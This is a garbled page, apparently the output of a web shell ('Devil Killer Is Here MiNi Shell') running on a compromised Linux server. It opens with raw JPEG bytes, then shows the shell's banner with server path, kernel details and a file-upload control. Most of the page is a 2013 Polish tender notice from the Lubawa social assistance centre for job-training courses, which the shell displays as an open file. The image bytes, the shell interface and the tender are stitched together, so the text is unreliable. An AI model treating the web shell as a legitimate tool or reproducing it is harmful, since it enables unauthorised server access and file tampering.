JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20130626/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20130626/124861-N-2013.html

<p class="kh_header"><b>Lubawa: ORGANIZACJA  I  PRZEPROWADZENIE  USŁUG EDUKACYJNYCH  I SZKOLENIOWYCH W DZIEDZINIE ROZWOJU OSOBISTEGO dla uczestników zadania publicznego Czas na aktywność 
realizowanego w 2013r.</b><br>
<b>Numer ogłoszenia: 124861 - 2013; data zamieszczenia: 26.06.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Ośrodek Pomocy Społecznej Gminy Lubawa , Fijewo 73, 14-260 Lubawa, woj. warmińsko-mazurskie, tel. 0-89 6455439, faks 0-89 6455439.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.gopslubawa.4bip.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> ORGANIZACJA  I  PRZEPROWADZENIE  USŁUG EDUKACYJNYCH  I SZKOLENIOWYCH W DZIEDZINIE ROZWOJU OSOBISTEGO dla uczestników zadania publicznego Czas na aktywność 
realizowanego w 2013r..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> PRZEDMIOTEM ZAMÓWIENIA jest Organizacja i przeprowadzenie usług edukacyjnych
i szkoleniowych  w dziedzinie rozwoju osobistego w ramach zadania publicznego Czas na aktywność realizowanego w ramach Programu Ministra Pracy i Polityki Społecznej Aktywne Formy Przeciwdziałania Wykluczeniu Społecznemu - edycja 2011-2015 p.n.Podmiot zatrudnienia socjalnego partnerem Ośrodka Pomocy Społecznej i Powiatowego Urzędu Pracy w realizacji kontraktów socjalnych - dla 10 uczestników zadania.
PRZEDMIOT ZAMÓWIENIA został podzielony na 3 części zamówienia, z których każda stanowi odrębną część i może być przedmiotem oferty częściowej
CZĘŚĆ  1

USŁUGA EDUKACYJNA  I  SZKOLENIOWA W DZIEDZINIE ROZWOJU OSOBISTEGO - obejmująca

Trening interpersonalny (grupowy) - dla 10 uczestników zadania
Ilość godz 24 godz. ( 6x4godz.miesiąc)
Okres realizacji LIPIEC - GRUDZIEŃ 2013r

Warsztaty kreowania wizerunku (grupowe) - dla 10 uczestników zadania

Ilość godz - 12 godz. (3 spotkania x 4 godz.każde)
Okres realizacji SIERPIEŃ 2013r

Warsztaty aktywizacji zawodowej (grupowe) - dla 10 uczestników zadania

Ilość godz - 30 godz. (6 spotkań x 5 godz.każde)
Okres realizacji LIPIEC 2013r

CZĘŚĆ 2

USŁUGA EDUKACYJNA  I  SZKOLENIOWA W DZIEDZINIE ROZWOJU OSOBISTEGO -  obejmująca

Kurs na prawo jazdy kat. B - dla 6 uczestników zadania
Ilość godz. - 60 godz (30 godz. zajęć teoretycznych, 30 godz. zajęć praktycznych)
Okres realizacji WRZESIEŃ  - PAŹDZIERNIK 2013r
 
CZĘŚĆ 3

USŁUGA EDUKACYJNA  I  SZKOLENIOWA W DZIEDZINIE ROZWOJU OSOBISTEGO -  obejmująca następujące kursy zawodowe

Kucharz małej gastronomii - dla 1 uczestnika zadania
Ilość godz. - 120 godz. 
Okres realizacji WRZESIEŃ - LISTOPAD 2013r

Operator wózka widłowego - dla 2 uczestników zadania
Ilość godz. - 67 godz. 
Okres realizacji WRZESIEŃ - LISTOPAD 2013r

Nowoczesny sprzedawca - dla 1 uczestnika zadania
Ilość godz. - 80 godz. 
Okres realizacji WRZESIEŃ - LISTOPAD  2013r

Opiekunka osób starszych - dla 3 uczestników zadania
Ilość godz. - 80 godz. (w tym: 40 godzin zajęć praktycznych)
Okres realizacji WRZESIEŃ - LISTOPAD 2013r

ZAKRES PRZEDMIOTU ZAMÓWIENIA (usługi)

CZĘŚĆ 1 USŁUGA EDUKACYJNA  I  SZKOLENIOWA W DZIEDZINIE ROZWOJU OSOBISTEGO     

TRENING  INTERPERSONALNY (grupowy)

Przygotowanie, organizacja i przeprowadzenie Treningu interpersonalnego dla                                      10 uczestników zadania zgodnie z ustalonym programem i  harmonogramem.
Zajęcia powinny mieć charakter warsztatowy z wykorzystaniem aktywnych metod nauczania,                    które pozwolą na umiejętne zastosowanie zdobytej wiedzy w rozwiązywaniu konkretnych problemów.
Program szkolenia powinien w szczególności zawierać następujące elementy
Rozwijanie kompetencji interpersonalnych, umiejętności współdziałania z ludźmi,
Analiza własnego stylu zachowania w grupie,
Rozwijanie asertywności w relacjach interpersonalnych - sposobów konstruktywnego przyjmowania krytyki i umiejętności przyjmowania zachowań, wydawania poleceń, stawiania granic i egzekwowania wymagań, doskonalenia umiejętności wyrażania opinii,
Doskonalenie umiejętności radzenia sobie w sytuacjach trudnych i konfliktowych,
Nabywania umiejętności radzenia sobie z trudnymi emocjami,
Wzmacniania poczucia własnej wartości,
Doskonalenia umiejętności pełnienia ról społecznych,
Doskonalenie umiejętności konstruktywnego zarządzania czasem,
Wzrost świadomości w kontaktach z ludźmi,
Podejście do obowiązków i pełnienia ról życiowych,
Kształtowanie odpowiednich ról społecznych, 
Budowanie własnej hierarchii potrzeb,
Umiejętności budowania harmonogramu działań,
Podniesienie świadomości na temat zmian społecznych.
Wykonawca będzie zobowiązany do
prowadzenia odpowiedniej dokumentacji projektowej oraz stałej współpracy z Ośrodkiem Pomocy Społecznej Gminy Lubawa,
systematycznej oceny postępów uczestników treningu,
bieżącego informowania Zamawiającego o 
wszystkich przypadkach nieobecności na treningu osób skierowanych,
rezygnacji uczestnika z treningu w trakcie jego trwania, pod rygorem odmowy zapłaty        za trening tych osób,
przeprowadzenia ankiet po zakończeniu treningu w celu zbadania nabytych umiejętności                    i kompetencji przez uczestników szkolenia oraz jakości zrealizowanej usługi,
sporządzenia Raportu ze zrealizowanego treningu i przedłożenia Zamawiającemu. 
Miejsce  realizacji  Klub Integracji Społecznej w Mortęgach lub inne w miarę występujących   potrzeb.


WARSZTATY KREOWANIA WIZERUNKU (grupowe)

Przygotowanie, organizacja i przeprowadzenie Warsztatów kreowania wizerunku                                   dla 10 uczestników zadania zgodnie z ustalonym harmonogramem.
Zajęcia powinny mieć charakter warsztatowy z wykorzystaniem aktywnych metod nauczania,                      które pozwolą na umiejętne zastosowanie zdobytej wiedzy w rozwiązywaniu konkretnych problemów.
Program szkolenia powinien w szczególności zawierać następujące elementy
Wzbogacanie wiedzy na tematy związane z autoprezentacją,
Zdobycie umiejętności wykorzystania wiedzy nt. autoprezentacji w praktyce
Rozwijanie umiejętności przygotowania się i zachowania podczas rozmowy kwalifikacyjnej.
Wykonawca będzie zobowiązany do
prowadzenia odpowiedniej dokumentacji projektowej oraz stałej współpracy z Ośrodkiem    Pomocy Społecznej Gminy Lubawa,
systematycznej oceny postępów uczestników warsztatu
bieżącego informowania Zamawiającego o 
wszystkich przypadkach nieobecności osób skierowanych do uczestnictwa                                 w warsztatach
rezygnacji uczestnika z udziału w formie wsparcia, pod rygorem odmowy zapłaty                             za warsztaty
przeprowadzenia ankiet po zakończeniu warsztatów w celu zbadania jakości zrealizowanej usługi
sporządzenia Raportu ze zrealizowanych warsztatów i przedłożenia Zamawiającemu. 
Miejsce  realizacji  Klub Integracji Społecznej w Mortęgach lub inne w miarę występujących potrzeb.


WARSZTATY AKTYWIZACJI ZAWODOWEJ (grupowe)

Przygotowanie, organizacja i przeprowadzenie Warsztatów aktywizacji zawodowej                               dla 10 uczestników zadania zgodnie z ustalonym harmonogramem.
Zajęcia powinny mieć charakter warsztatowy z wykorzystaniem aktywnych metod nauczania,                    które pozwolą na umiejętne zastosowanie zdobytej wiedzy w rozwiązywaniu konkretnych problemów.
Program szkolenia powinien w szczególności zawierać następujące elementy
Rozpoznawanie trudności w znalezieniu pracy,
Informacja o zawodach,
Poznanie etapów motywacji w podjęciu aktywności zawodowej,
Określenie własnego potencjału,
Analizowanie rynku pracy,
Przygotowanie się do podjęcia lub złożenia oferty pracy,
Poznanie zasad sporządzania dokumentów aplikacyjnych i metod poszukiwania pracy,
Przygotowanie prezentacji własnej kandydatury przyszłemu pracodawcy,
Przygotowanie do rozmowy kwalifikacyjnej,
Najczęstsze błędy podczas rozmowy kwalifikacyjnej
Negocjowanie warunków płacy i pracy,
Cechy przedsiębiorczego pracownika.
Wykonawca będzie zobowiązany do
prowadzenia odpowiedniej dokumentacji projektowej oraz stałej współpracy z Ośrodkiem    prowadzenia odpowiedniej dokumentacji projektowej oraz stałej współpracy z Ośrodkiem    Pomocy Społecznej Gminy Lubawa,
systematycznej oceny postępów uczestników warsztatu,
bieżącego informowania Zamawiającego o wszystkich przypadkach nieobecności osób skierowanych do uczestnictwa                                 w warsztatach,
rezygnacji uczestnika z udziału w formie wsparcia, pod rygorem odmowy zapłaty                             za warsztaty,
przeprowadzenia ankiet po zakończeniu warsztatów w celu zbadania jakości zrealizowanej usługi,
sporządzenia Raportu ze zrealizowanych warsztatów i przedłożenia Zamawiającemu. 
Miejsce  realizacji  Klub Integracji Społecznej w Mortęgach lub inne, w miarę występujących potrzeb.


CZĘŚĆ 2 USŁUGA EDUKACYJNA  I  SZKOLENIOWA W DZIEDZINIE ROZWOJU OSOBISTEGO     

KURS NA PRAWO JAZDY KAT. B

Przygotowanie, organizacja i przeprowadzenie Kursu na prawo jazdy kat B.                            dla 6 uczestników zadania zgodnie z ustalonym harmonogramem.
Wykonawca będzie zobowiązany do
prowadzenia odpowiedniej dokumentacji projektowej oraz stałej współpracy z Ośrodkiem   Pomocy Społecznej Gminy Lubawa,
systematycznej oceny postępów uczestników szkolenia,
bieżącego informowania Zamawiającego o 
wszystkich przypadkach nieobecności na kursie osób skierowanych,
rezygnacji uczestnika z kursu w trakcie jego trwania, pod rygorem odmowy zapłaty 
za kurs tych osób,
przeprowadzenia ankiet po zakończeniu kursu w celu zbadania nabytych umiejętności                    i kompetencji przez uczestników szkolenia oraz jakości zrealizowanej usługi,
sporządzenia Raportu ze zrealizowanego kursu i przedłożenia Zamawiającemu. 
dokonania za poszczególnych uczestników szkolenia  opłaty za 
wymagane badania lekarskie,  
pierwszy egzamin państwowy na prawo jazdy kat. B.

ubezpieczenia uczestnika zadania  od następstw  nieszczęśliwego wypadku powstałych 
w związku ze szkoleniem (kserokopia opłaconej polisy potwierdzoną za zgodność z oryginałem  należy przekazać Zamawiającemu przed rozpoczęciem szkoleń)
przedłożenia Zamawiającemu kserokopii dokumentów wystawionych przez Wojewódzki Ośrodek Ruchu Drogowego (WORD), potwierdzających termin egzaminów państwowych w WORD dla poszczególnych uczestników projektu.  
Miejsce  realizacji
Zajęcia teoretyczne - Miasto Lubawa, Gmina Lubawa, Miasto Iława
Zajęcia praktyczne - Miasto Lubawa, Gmina Lubawa, Miasto Iława oraz inne miejsca wg. potrzeb wynikających z należytej i koniecznej realizacji szkolenia.


CZĘŚĆ 3 USŁUGA EDUKACYJNA  I  SZKOLENIOWA W DZIEDZINIE ROZWOJU OSOBISTEGO    

Kurs zawodowy KUCHARZ MAŁEJ GASTRONOMII 
Przygotowanie, organizacja i przeprowadzenie Kursu zawodowego - kucharz gastronomii małej  dla 1 uczestnika zadania zgodnie z ustalonym harmonogramem.
Program szkolenia powinien w szczególności zawierać następujące elementy: 
przepisy BHP, PPOŻ,
technologia gastronomiczna,
zasady żywienia,	
towaroznawstwo,
sporządzanie potraw.
Wykonawca będzie zobowiązany do
prowadzenia odpowiedniej dokumentacji projektowej oraz stałej współpracy z Ośrodkiem   Pomocy Społecznej Gminy Lubawa,
systematycznej oceny postępów uczestników szkolenia,
bieżącego informowania Zamawiającego o 
wszystkich przypadkach nieobecności na kursie osób skierowanych,
rezygnacji uczestnika z kursu w trakcie jego trwania, pod rygorem odmowy zapłaty za kurs tych osób,
przeprowadzenia ankiet po zakończeniu kursu w celu zbadania nabytych umiejętności                    i kompetencji przez uczestników szkolenia oraz jakości zrealizowanej usługi,
sporządzenia Raportu ze zrealizowanego kursu i przedłożenia Zamawiającemu. 
Miejsce  realizacji 
Zajęcia teoretyczne - Miasto Lubawa, Gmina Lubawa, Miasto Iława
Zajęcia praktyczne - Miasto Lubawa, Gmina Lubawa, Miasto Iława


Kurs zawodowy OPERATOR WÓZKA WIDŁOWEGO

Przygotowanie, organizacja i przeprowadzenie Kursu zawodowego - operator wózka widłowego  dla 2 uczestników zadania zgodnie z ustalonym harmonogramem.
Wykonawca będzie zobowiązany do
prowadzenia odpowiedniej dokumentacji projektowej oraz stałej współpracy z Ośrodkiem   Pomocy Społecznej Gminy Lubawa,
systematycznej oceny postępów uczestników szkolenia,
bieżącego informowania Zamawiającego o 
wszystkich przypadkach nieobecności na kursie osób skierowanych,
rezygnacji uczestnika z kursu w trakcie jego trwania, pod rygorem odmowy zapłaty za kurs tych osób,
przeprowadzenia ankiet po zakończeniu kursu w celu zbadania nabytych umiejętności                    i kompetencji przez uczestników szkolenia oraz jakości zrealizowanej usługi,
sporządzenia Raportu ze zrealizowanego kursu i przedłożenia Zamawiającemu. 
Miejsce  realizacji
Zajęcia teoretyczne - Miasto Lubawa, Gmina Lubawa, Miasto Iława
Zajęcia praktyczne - Miasto Lubawa, Gmina Lubawa, Miasto Iława


Kurs zawodowy NOWOCZESNY SPRZEDAWCA

Przygotowanie, organizacja i przeprowadzenie Kursu zawodowego - nowoczesny sprzedawca dla 1 uczestnika zadania zgodnie z ustalonym harmonogramem.
Wykonawca będzie zobowiązany do
prowadzenia odpowiedniej dokumentacji projektowej oraz stałej współpracy z Ośrodkiem   Pomocy Społecznej Gminy Lubawa,
systematycznej oceny postępów uczestników szkolenia,
bieżącego informowania Zamawiającego o 
wszystkich przypadkach nieobecności na kursie osób skierowanych,
rezygnacji uczestnika z kursu w trakcie jego trwania, pod rygorem odmowy zapłaty za kurs tych osób,
przeprowadzenia ankiet po zakończeniu kursu w celu zbadania nabytych umiejętności                    i kompetencji przez uczestników szkolenia oraz jakości zrealizowanej usługi,
sporządzenia Raportu ze zrealizowanego kursu i przedłożenia Zamawiającemu. 
Miejsce  realizacji
Zajęcia teoretyczne - Miasto Lubawa, Gmina Lubawa, Miasto Iława;
Zajęcia praktyczne - Miasto Lubawa, Gmina Lubawa, Miasto Iława;


Kurs zawodowy OPIEKUNKA OSÓB STARSZYCH

Przygotowanie, organizacja i przeprowadzenie Kursu zawodowego - opiekunka osób  starszych  dla 3 uczestników zadania zgodnie z ustalonym harmonogramem.
Program szkolenia powinien obejmować, m. in
utrzymanie czystości i higieny,
opieka nad osobami niepełnosprawnymi, starszymi i przewlekle chorymi,
podstawowe zabiegi pielęgnacyjne i pierwsza pomoc przedlekarska,
współpraca ze środowiskiem zawodowym i służbą zdrowia.
Wykonawca będzie zobowiązany do
prowadzenia odpowiedniej dokumentacji projektowej oraz stałej współpracy z Ośrodkiem   Pomocy Społecznej Gminy Lubawa,
systematycznej oceny postępów uczestników szkolenia,
bieżącego informowania Zamawiającego o 
wszystkich przypadkach nieobecności na kursie osób skierowanych,
rezygnacji uczestnika z kursu w trakcie jego trwania, pod rygorem odmowy zapłaty za kurs tych osób,
przeprowadzenia ankiet po zakończeniu kursu w celu zbadania nabytych umiejętności                    i kompetencji przez uczestników szkolenia oraz jakości zrealizowanej usługi,
sporządzenia Raportu ze zrealizowanego kursu i przedłożenia Zamawiającemu. 
Miejsce  realizacji
Zajęcia teoretyczne - Miasto Lubawa, Gmina Lubawa, Miasto Iława
Zajęcia praktyczne - Miasto Lubawa, Gmina Lubawa, Miasto Iława



WYMAGANIA  W  ZAKRESIE  REALIZACJI PRZEDMIOTU ZAMÓWIENIA (usługi)

Miejsce realizacji warsztatów i treningów
Klub Integracji Społecznej w Mortęgach (mieszczący się w Świetlicy Wiejskiej w Mortęgach) lub inne w miarę występujących potrzeb. Pomieszczenia udostępnione Wykonawcom nieodpłatnie.

Miejsce realizacji kursów
Zajęcia teoretyczne - Miasto Lubawa, Gmina Lubawa, Miasto Iława
Zajęcia praktyczne - Miasto Lubawa, Gmina Lubawa, Miasto Iława oraz inne miejsca wg potrzeb wynikających z należytej i koniecznej realizacji szkolenia.

Inne wymagania względem realizacji  przedmiotu zamówienia

Wykonawca jest zobowiązany do dbania o należyty stan pomieszczeń oddanych do korzystania na cele związane z realizacją usługi edukacyjnej i szkoleniowej                                    (w czasie zajęć i po ich zakończeniu),
Za wszelkie szkody powstałe w pomieszczeniu oddanych Wykonawcy do realizacji usługi szkoleniowej odpowiada Wykonawca, który zobowiązany jest do bezzwłocznego naprawienia ich we własnym zakresie.
Wykonawca jest  zobowiązany do prowadzenia odpowiedniej dokumentacji potwierdzającej realizację usług, w tym m.in Karty usług, List obecności
Wykonawca podczas realizacji zajęć, warsztatów, treningów itp. jest zobowiązany do zagwarantowania uczestnikom szkolenia
materiałów szkoleniowych oznakowanych w logotypy, 
sprzętu i materiałów niezbędnych do należytej realizacji przedmiotu zamówienia,
Szkolenia muszą być zrealizowane zgodnie z Rozporządzeniem MEN w sprawie uzyskiwania i uzupełnienia przez osoby dorosłe wiedzy ogólnej, umiejętności
i kwalifikacji zawodowych w formach pozaszkolnych, w przypadku kursu prawa jazdy  kat. B zgodnie z przepisami ustawy z dnia 20 czerwca 1997r. Prawo o ruchu drogowym (tekst jedn. Dz.U. z 2012r. poz. 1137, 1448), ustawy z dnia 5 stycznia 2011r. o kierujących pojazdami (Dz.U. z 2011r. nr 30 poz. 151 z późn. zm.) oraz Rozporządzeniem Ministra Infrastruktury z dnia 27 października 2005r. w sprawie szkolenia, egzaminowania i uzyskiwania uprawnień przez kierujących pojazdami, instruktorów i egzaminatorów (Dz.U. z 2005r., Nr 217, poz. 1834 z późn. zm.) i innymi  aktualnie obowiązującymi przepisami prawa. 
Po zakończeniu poszczególnych szkoleń wchodzących w skład Wykonawca zobowiązany jest do wystawienia każdemu uczestnikowi Certyfikatu lub zaświadczenia ukończenia szkolenia lub kursu.</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 80.00.00.00-4, 80.57.00.00-0, 80.41.12.00-0.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 3.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.12.2013.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunkiem udziału w postępowaniu jest spełnienie warunków zawartych w niniejszym Specyfikacji Istotnych Warunków Zamówienia (SIWZ) oraz art. 22 ust. 1 ustawy z dnia 29 stycznia 2004 r. - Prawo zamówień publicznych zwanej dalej ustawą Pzp. 
O udzielenie niniejszego zamówienia mogą ubiegać się Wykonawcy, którzy: 
Posiadają uprawnienia do wykonywania określonej działalności lub czynności jeżeli przepisy prawa nakładają obowiązek ich posiadania. 
Posiadają niezbędną wiedzę i doświadczenie oraz dysponują potencjałem technicznym i osobami zdolnymi do wykonania zamówienia i wykażą że: 

w okresie ostatnich trzech lat przed wszczęciem postępowania, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie przeprowadzili co najmniej 2 szkolenia usługi odpowiadające swoim rodzajem usługom stanowiącym przedmiot zamówienia w ramach poszczególnych części zamówienia dla klientów  pomocy społecznej Miejskich Ośrodków Pomocy Społecznej, Gminnych Ośrodków Pomocy Społecznej, Powiatowych Centrów Pomocy Społecznej -  tj

CZĘŚĆ 1: 
co najmniej 2 usługi z zakresu:
Warsztatów aktywizacji zawodowej Doradztwa zawodowego
Treningu interpersonalnego Warsztatów interpersonalnych lub innych zajęć
w ramach  których były realizowane zajęcia z zakresu kompetencji interpersonalnych i społecznych,
Warsztatów kreowania wizerunku lub innych zajęć w ramach których były realizowane zajęcia z zakresu autoprezentacji.
CZĘŚĆ 2: 
co najmniej 2 usługi z zakresu Kurs prawa jazdy kat. B

CZĘŚĆ 3:
co najmniej 2 usługi z zakresu kursów zawodowych będących przedmiotem zamówienia. 
dysponują osobami które posiadają wykształcenie niezbędne do realizacji poszczególnych
wykładowcy/trenerzy zajęć teoretycznych biorący udział w realizacji zamówienia muszą posiadać wykształcenie wyższe o kierunku zgodnym z tematyką prowadzonych szkoleń lub wykształcenie wyższe i specjalizację kierunkową lub inne  uprawniające do prowadzenia w/w szkoleń będących przedmiotem zamówienia

trenerzy zajęć praktycznych biorący udział w realizacji zamówienia muszą posiadać  co najmniej wykształcenie średnie zgodne z tematyką prowadzonych szkoleń lub średnie i szkolenie kierunkowe lub inne uprawniające do prowadzenia szkoleń będących przedmiotem zamówienia; 
Dysponują  pomieszczeniami, urządzeniami sprzętem i materiałami dydaktycznymi niezbędnym do należytej realizacji zajęć teoretycznych i praktycznych.
Znajdują się w sytuacji finansowej zapewniającej wykonanie zamówienia. 
Nie podlegają wykluczeniu z postępowania na podstawie art. 24 Pzp. 

Ocena spełniania w/w warunków dokonana zostanie w oparciu o informacje zawarte 
w dokumentach i oświadczeniach wyszczególnionych w pkt. 10 niniejszej Specyfikacji Istotnych Warunków Zamówienia (SIWZ). Z treści załączonych dokumentów musi wynikać jednoznacznie, iż w/w warunki Wykonawca spełnił. 
Uzupełnienie wymaganych dokumentów jest możliwe po upływie terminu składania ofert,  tylko 
i wyłącznie na podstawie art. 26 ust. 3 ustawy Pzp. 
Nie spełnienie chociażby jednego z w/w warunków skutkować będzie wykluczeniem Wykonawcy                       z postępowania.




W celu potwierdzenia spełniania warunków udziału w postępowaniu Wykonawca zobowiązany jest złożyć wraz z odpowiednio wypełnionym i podpisanym FORMULARZEM OFERTOWYM, stanowiącym Załącznik nr 1 do SIWZ  

Oświadczenie o spełnianiu warunków udziału w postępowaniu zgodnie z art. 22 ust. 1 ustawy Pzp. - wzór oświadczenia - Załącznik nr 2 do Specyfikacji Istotnych Warunków Zamówienia (SIWZ). oraz nie podleganiu wykluczeniu na podstawie art. 24 ust. 1 ustawy Pzp. - wzór oświadczenia - Załącznik nr 3 do Specyfikacji Istotnych Warunków Zamówienia (SIWZ).  
Następujące oświadczenia i dokumenty
W celu potwierdzenia spełnienia warunku, o którym mowa w pkt. 9 pkt. 1
Aktualny odpis z właściwego rejestru albo aktualne zaświadczenia o wpisie 
do ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu 
do rejestru lub zgłoszenia do ewidencji działalności gospodarczej, wystawione nie wcześniej niż  6 miesięcy przed upływem terminu składania ofert, a w stosunku
do osób fizycznych oświadczenia w zakresie art. 24 ust.1 pkt.2 ustawy.
